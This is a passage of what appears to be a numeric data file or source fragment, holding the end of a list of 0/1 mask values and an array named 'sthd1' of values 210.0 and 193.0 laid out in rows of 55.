1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
sthd1 = [210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
